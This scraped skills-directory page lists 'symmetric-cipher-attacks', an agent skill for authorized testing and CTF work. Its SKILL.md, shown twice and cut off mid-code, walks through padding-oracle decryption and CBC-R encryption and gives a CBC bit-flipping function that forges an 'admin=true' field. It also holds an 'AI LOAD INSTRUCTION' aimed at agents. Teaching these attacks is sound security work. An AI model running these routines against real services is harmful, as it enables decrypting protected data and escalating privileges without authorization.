Symmetric Cipher Attacks

Name: Symmetric Cipher Attacks
Author: yaklang

yaklang/hack-skills

Load deep block-cipher attack scripts and walkthroughs when authorized security testing or CTF work needs padding oracle and related exploits.

Overview

symmetric-cipher-attacks is an agent skill for the Ship phase that provides detailed block-cipher attack implementations and walkthroughs such as padding-oracle exploitation.

Install

npx skills add https://github.com/yaklang/hack-skills --skill symmetric-cipher-attacks

What is this skill?

Full padding-oracle walkthrough with PKCS#7 padding rules and byte-by-byte CBC decryption logic
Step-by-step attack internals (intermediate values I[n], modified prev-block oracle queries)
Companion depth module—assumes main symmetric-cipher SKILL.md already loaded for decision trees
Edge-case handling for invalid padding patterns (e.g., 0x00 never valid in PKCS#7)
Structured for exploit scripting rather than casual copy-paste into production apps
Documents 16-byte block size examples for PKCS#7 padding
Section 1 provides a full padding-oracle walkthrough with byte-by-byte decryption

Compatible agents: Claude Code, Cursor, Codex, any compatible agent

Adoption & trust: 1k installs on skills.sh; 980 GitHub stars; 1/3 security scanners passed (skills.sh audits).

What problem does it solve?

You identified a suspected CBC padding oracle and need precise byte-decryption steps instead of a vague "try a PO attack" checklist.

Who is it for?

Authorized pentesters, security-minded indie devs auditing their own ciphertext endpoints, or CTF players with the parent cipher skill already in context.

Skip if: Unauthorized testing of third-party systems, beginners learning baseline TLS setup, or teams that only need "use AES-GCM" guidance without exploit depth.

When should I use this skill?

Load when full attack implementations, step-by-step walkthroughs, and edge-case handling for block cipher exploitation are needed and the main symmetric-cipher SKILL.md is already loaded.

What do I get? / Deliverables

You get scripted padding-oracle internals and PKCS#7 edge cases to validate findings or reproduce lab proofs under authorization.

Attack procedure aligned to padding-oracle and related block cipher scenarios
Documented PKCS#7 valid/invalid padding reference for oracle tuning

Recommended Skills

Azure Compliancemicrosoft/azure-skills

Azure Compliance is a Microsoft agent skill for solo builders and small teams who need structured security and complianc…373k installs·1.2k stars

Openclaw Secure Linux Cloudxixu-me/skills

OpenClaw Secure Linux Cloud guides a hardened VPS deployment—rootless Podman, loopback-only gateway, SSH-tunneled Contro…201k installs·61 stars

Entra Agent Idmicrosoft/azure-skills

entra-agent-id is a Microsoft-authored agent skill for provisioning and operating OAuth-capable identities tailored to A…99.1k installs·1.2k stars

Firebase Security Rules Auditorfirebase/agent-skills

Firebase Security Rules Auditor turns your agent into a senior penetration-style reviewer for Firestore rulesets. Solo b…40.3k installs·345 stars

Firestore Security Rules Auditorfirebase/agent-skills

Firestore-security-rules-auditor is a checker skill for solo builders and small teams shipping Firebase-backed apps who …20.3k installs·345 stars

Skill Vetteruseai-pro/openclaw-skills-security

Skill Vetter is a security-first OpenClaw agent skill that makes your coding agent behave like a pre-install auditor for…19.2k installs·62 stars

Journey fit

Primary fit

Shelf is ship/security because the skill supports pre-release or ongoing hardening reviews and offensive verification of crypto misuse. Detailed attack implementations complement high-level cipher selection guidance when you must prove or fix vulnerable CBC/PKCS#7 behavior.

How it compares

Offensive exploit walkthrough module—not a compliance checklist skill and not a general encryption library tutorial.

Common Questions / FAQ

Who is symmetric-cipher-attacks for?

Developers and researchers doing authorized application security work who need implementation-level block cipher attack scripts after reading the main symmetric-cipher skill.

When should I use symmetric-cipher-attacks?

During Ship security reviews when validating custom crypto endpoints, reproducing lab padding-oracle flaws, or extending YakLang hack workflows—not for routine feature development.

Is symmetric-cipher-attacks safe to install?

Treat it as sensitive offensive material; review the Security Audits panel on this Prism page and restrict agent autonomy so exploits run only in scoped, authorized environments.

SKILL.md

READMESKILL.md - Symmetric Cipher Attacks

# Block Cipher Attacks — Detailed Scripts & Walkthrough

> **AI LOAD INSTRUCTION**: Load this when you need full attack implementations, step-by-step walkthroughs, and edge-case handling for block cipher exploitation. Assumes the main [SKILL.md](./SKILL.md) is already loaded for attack selection and decision trees.

---

## 1. PADDING ORACLE — FULL WALKTHROUGH

### 1.1 PKCS#7 Padding Review

```
Block size: 16 bytes
Data "HELLO" (5 bytes) → padded to 16 bytes:
  48 45 4C 4C 4F 0B 0B 0B 0B 0B 0B 0B 0B 0B 0B 0B
  
Valid padding examples (last byte determines):
  ...01           → 1 byte of padding
  ...02 02        → 2 bytes of padding
  ...03 03 03     → 3 bytes of padding
  ...10 10 10 ... → 16 bytes (full block of padding)

Invalid:
  ...03 03 04     → last byte says 4, but 3rd-from-end ≠ 04
  ...00           → 0x00 is never valid PKCS#7
```

### 1.2 Attack Internals — Byte-by-Byte Decryption

```
Target: decrypt P[15] (last byte of target block)

CBC decryption internals:
  I[15] = AES_DEC(C_target)[15]    (intermediate value, unknown)
  P[15] = I[15] ⊕ C_prev[15]       (plaintext = intermediate ⊕ prev ciphertext)

Attack for padding 0x01 (valid when last plaintext byte = 0x01):
  We send: C'_prev || C_target
  Where C'_prev[15] = guess

  Server computes: P'[15] = I[15] ⊕ guess
  If P'[15] == 0x01, padding is valid!
  
  Therefore: I[15] = guess ⊕ 0x01
  And: P[15] = I[15] ⊕ original_C_prev[15]

Next: decrypt P[14] (need padding = 0x02 0x02):
  Set C'_prev[15] = I[15] ⊕ 0x02   (forces P'[15] = 0x02)
  Brute force C'_prev[14] until P'[14] = 0x02

Continue until all 16 bytes recovered.
```

### 1.3 Handling False Positives

```python
def is_real_padding(oracle, modified_block, target_block, byte_pos, block_size):
    """
    When cracking the last byte, padding 0x02 0x02 can give false positive.
    Verify by flipping the penultimate byte — if still valid, it was 0x01.
    """
    if byte_pos != block_size - 1:
        return True

    check = bytearray(modified_block)
    check[byte_pos - 1] ^= 1  # flip adjacent byte
    return oracle(bytes(check) + target_block)
```

### 1.4 Encryption via Padding Oracle (CBC-R)

A padding oracle can also encrypt arbitrary plaintext without the key:

```python
def padding_oracle_encrypt(plaintext, block_size, oracle):
    """Encrypt arbitrary plaintext using padding oracle (CBC-R technique)."""
    # Pad plaintext
    pad_len = block_size - (len(plaintext) % block_size)
    padded = plaintext + bytes([pad_len] * pad_len)
    pt_blocks = [padded[i:i+block_size] for i in range(0, len(padded), block_size)]

    # Start with random last ciphertext block
    import os
    ct_blocks = [os.urandom(block_size)]

    # Work backwards
    for pt_block in reversed(pt_blocks):
        # Use padding oracle to find intermediate values for ct_blocks[0]
        intermediate = decrypt_block_intermediate(ct_blocks[0], block_size, oracle)
        # Previous CT block = intermediate ⊕ desired plaintext
        prev_ct = bytes(i ^ p for i, p in zip(intermediate, pt_block))
        ct_blocks.insert(0, prev_ct)

    return b"".join(ct_blocks)  # first block is IV
```

---

## 2. CBC BIT FLIPPING — ADVANCED SCENARIOS

### 2.1 Multi-Byte Flip

```python
def cbc_multibyte_flip(ciphertext, block_size, changes):
    """
    changes: list of (absolute_position, old_byte, new_byte)
    All changes must be in the SAME target block.
    """
    ct = bytearray(ciphertext)

    for pos, old, new in changes:
        target_block = pos // block_size
        byte_in_block = pos % block_size
        prev_block_pos = (target_block - 1) * block_size + byte_in_block
        ct[prev_block_pos] ^= old ^ new

    return bytes(ct)

# Example: change ";admin=false;" to ";admin=true;x"
changes = [
    (32 + 7, ord('f'), ord('t')),   # f → t
    (32 + 8, ord('a'), ord('r')),   # a → r
    (32 + 9, ord('l'), ord('u')),   # l → u
    (32 + 10, ord('s'), ord('e')),  # s → e
    (32 + 11, ord('e'), ord(';')),  # e → ;
    (32 + 12, ord(';'),

What is this skill?

Full padding-oracle walkthrough with PKCS#7 padding rules and byte-by-byte CBC decryption logic

Step-by-step attack internals (intermediate values I[n], modified prev-block oracle queries)

Companion depth module—assumes main symmetric-cipher SKILL.md already loaded for decision trees

Edge-case handling for invalid padding patterns (e.g., 0x00 never valid in PKCS#7)

Structured for exploit scripting rather than casual copy-paste into production apps

Documents 16-byte block size examples for PKCS#7 padding

Section 1 provides a full padding-oracle walkthrough with byte-by-byte decryption

Compatible agents: Claude Code, Cursor, Codex, any compatible agent

Adoption & trust: 1k installs on skills.sh; 980 GitHub stars; 1/3 security scanners passed (skills.sh audits).

Who is it for?

Authorized pentesters, security-minded indie devs auditing their own ciphertext endpoints, or CTF players with the parent cipher skill already in context.

Skip if: Unauthorized testing of third-party systems, beginners learning baseline TLS setup, or teams that only need "use AES-GCM" guidance without exploit depth.

Journey fit

Primary fit

SKILL.md

READMESKILL.md - Symmetric Cipher Attacks

# Block Cipher Attacks — Detailed Scripts & Walkthrough

> **AI LOAD INSTRUCTION**: Load this when you need full attack implementations, step-by-step walkthroughs, and edge-case handling for block cipher exploitation. Assumes the main [SKILL.md](./SKILL.md) is already loaded for attack selection and decision trees.

---

## 1. PADDING ORACLE — FULL WALKTHROUGH

### 1.1 PKCS#7 Padding Review

```
Block size: 16 bytes
Data "HELLO" (5 bytes) → padded to 16 bytes:
  48 45 4C 4C 4F 0B 0B 0B 0B 0B 0B 0B 0B 0B 0B 0B
  
Valid padding examples (last byte determines):
  ...01           → 1 byte of padding
  ...02 02        → 2 bytes of padding
  ...03 03 03     → 3 bytes of padding
  ...10 10 10 ... → 16 bytes (full block of padding)

Invalid:
  ...03 03 04     → last byte says 4, but 3rd-from-end ≠ 04
  ...00           → 0x00 is never valid PKCS#7
```

### 1.2 Attack Internals — Byte-by-Byte Decryption

```
Target: decrypt P[15] (last byte of target block)

CBC decryption internals:
  I[15] = AES_DEC(C_target)[15]    (intermediate value, unknown)
  P[15] = I[15] ⊕ C_prev[15]       (plaintext = intermediate ⊕ prev ciphertext)

Attack for padding 0x01 (valid when last plaintext byte = 0x01):
  We send: C'_prev || C_target
  Where C'_prev[15] = guess

  Server computes: P'[15] = I[15] ⊕ guess
  If P'[15] == 0x01, padding is valid!
  
  Therefore: I[15] = guess ⊕ 0x01
  And: P[15] = I[15] ⊕ original_C_prev[15]

Next: decrypt P[14] (need padding = 0x02 0x02):
  Set C'_prev[15] = I[15] ⊕ 0x02   (forces P'[15] = 0x02)
  Brute force C'_prev[14] until P'[14] = 0x02

Continue until all 16 bytes recovered.
```

### 1.3 Handling False Positives

```python
def is_real_padding(oracle, modified_block, target_block, byte_pos, block_size):
    """
    When cracking the last byte, padding 0x02 0x02 can give false positive.
    Verify by flipping the penultimate byte — if still valid, it was 0x01.
    """
    if byte_pos != block_size - 1:
        return True

    check = bytearray(modified_block)
    check[byte_pos - 1] ^= 1  # flip adjacent byte
    return oracle(bytes(check) + target_block)
```

### 1.4 Encryption via Padding Oracle (CBC-R)

A padding oracle can also encrypt arbitrary plaintext without the key:

```python
def padding_oracle_encrypt(plaintext, block_size, oracle):
    """Encrypt arbitrary plaintext using padding oracle (CBC-R technique)."""
    # Pad plaintext
    pad_len = block_size - (len(plaintext) % block_size)
    padded = plaintext + bytes([pad_len] * pad_len)
    pt_blocks = [padded[i:i+block_size] for i in range(0, len(padded), block_size)]

    # Start with random last ciphertext block
    import os
    ct_blocks = [os.urandom(block_size)]

    # Work backwards
    for pt_block in reversed(pt_blocks):
        # Use padding oracle to find intermediate values for ct_blocks[0]
        intermediate = decrypt_block_intermediate(ct_blocks[0], block_size, oracle)
        # Previous CT block = intermediate ⊕ desired plaintext
        prev_ct = bytes(i ^ p for i, p in zip(intermediate, pt_block))
        ct_blocks.insert(0, prev_ct)

    return b"".join(ct_blocks)  # first block is IV
```

---

## 2. CBC BIT FLIPPING — ADVANCED SCENARIOS

### 2.1 Multi-Byte Flip

```python
def cbc_multibyte_flip(ciphertext, block_size, changes):
    """
    changes: list of (absolute_position, old_byte, new_byte)
    All changes must be in the SAME target block.
    """
    ct = bytearray(ciphertext)

    for pos, old, new in changes:
        target_block = pos // block_size
        byte_in_block = pos % block_size
        prev_block_pos = (target_block - 1) * block_size + byte_in_block
        ct[prev_block_pos] ^= old ^ new

    return bytes(ct)

# Example: change ";admin=false;" to ";admin=true;x"
changes = [
    (32 + 7, ord('f'), ord('t')),   # f → t
    (32 + 8, ord('a'), ord('r')),   # a → r
    (32 + 9, ord('l'), ord('u')),   # l → u
    (32 + 10, ord('s'), ord('e')),  # s → e
    (32 + 11, ord('e'), ord(';')),  # e → ;
    (32 + 12, ord(';'),

Overview

Install

What is this skill?

What problem does it solve?

Who is it for?

When should I use this skill?

What do I get? / Deliverables

Recommended Skills

Journey fit

Who is symmetric-cipher-attacks for?

When should I use symmetric-cipher-attacks?

Is symmetric-cipher-attacks safe to install?

SKILL.md

This week for builders

Overview

Install

What is this skill?

What problem does it solve?

Who is it for?

When should I use this skill?

What do I get? / Deliverables

Recommended Skills

Journey fit

Who is symmetric-cipher-attacks for?

When should I use symmetric-cipher-attacks?

Is symmetric-cipher-attacks safe to install?

SKILL.md